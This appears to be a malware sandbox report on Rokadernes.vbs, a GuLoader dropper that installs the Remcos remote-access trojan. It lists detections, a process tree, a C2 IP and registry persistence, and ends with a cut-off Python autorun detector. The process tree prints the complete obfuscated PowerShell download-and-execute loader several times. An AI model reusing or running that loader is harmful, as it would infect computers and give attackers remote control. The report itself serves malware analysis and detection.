Windows Analysis Report
Rokadernes.vbs

Overview

General Information

Sample name: Rokadernes.vbs
Analysis ID: 1579623
MD5: 693321a98dce16a4369d750bac3c4fb0
SHA1: cadf2497394e79cfd3c02a4f5bbb1adb6503d29c
SHA256: d719392462e09d59474cafa8d7b107d4e3063a664a51e87c5e2b750cf100be69
Tags: GuLoader, vbs, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6740 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. 
,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA 
laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 764 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. 
,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA 
laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6804 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • remcos.exe (PID: 7096 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 2688 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • remcos.exe (PID: 4348 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author
00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Source | Rule | Description | Author
amsi64_2504.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_764.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
              • 0xc2d1:$b2: ::FromBase64String(
              • 0xb34c:$s1: -join
              • 0x4af8:$s4: +=
              • 0x4bba:$s4: +=
              • 0x8de1:$s4: +=
              • 0xaefe:$s4: +=
              • 0xb1e8:$s4: +=
              • 0xb32e:$s4: +=
              • 0x15731:$s4: +=
              • 0x157b1:$s4: +=
              • 0x15877:$s4: +=
              • 0x158f7:$s4: +=
              • 0x15acd:$s4: +=
              • 0x15b51:$s4: +=
              • 0xbb79:$e4: Get-WmiObject
              • 0xbd68:$e4: Get-Process
              • 0xbdc0:$e4: Start-Process
              • 0x163b3:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", ProcessId: 6740, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.21.86.72, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6804, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Rokadernes.vbs", ProcessId: 6740, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Te
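The two Registry Key set entries above are Sysmon EventID 13 (registry value set) records. The 32-bit msiexec.exe host (PID 6804, the process in which the sandbox found Remcos in memory) writes the same value name, Rmc-6US4Y7, to the user's Run key and to the WOW6432Node view of the machine Run key, both pointing at C:\ProgramData\Remcos\remcos.exe. The Python below is an added example, not part of the report: it parses records in the page's key: value layout and flags autorun values that either point into a user-writable directory or are written by a Microsoft-signed host binary that has no business registering third-party autoruns. The records are constructed; the first two mirror the entries above, the third is an invented benign installer used as a control.

```python
import re
from pathlib import PureWindowsPath

# Constructed records in the "key: value, key: value" layout of the Sigma entries above.
# EventID 13 is the Sysmon RegistryEvent for a value being set. The first two mirror the
# report's Rmc-6US4Y7 entries; the third is an invented benign installer for contrast.
RECORDS = [
    r'Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, '
    r'Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6804, '
    r'TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-6US4Y7',
    r'Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, '
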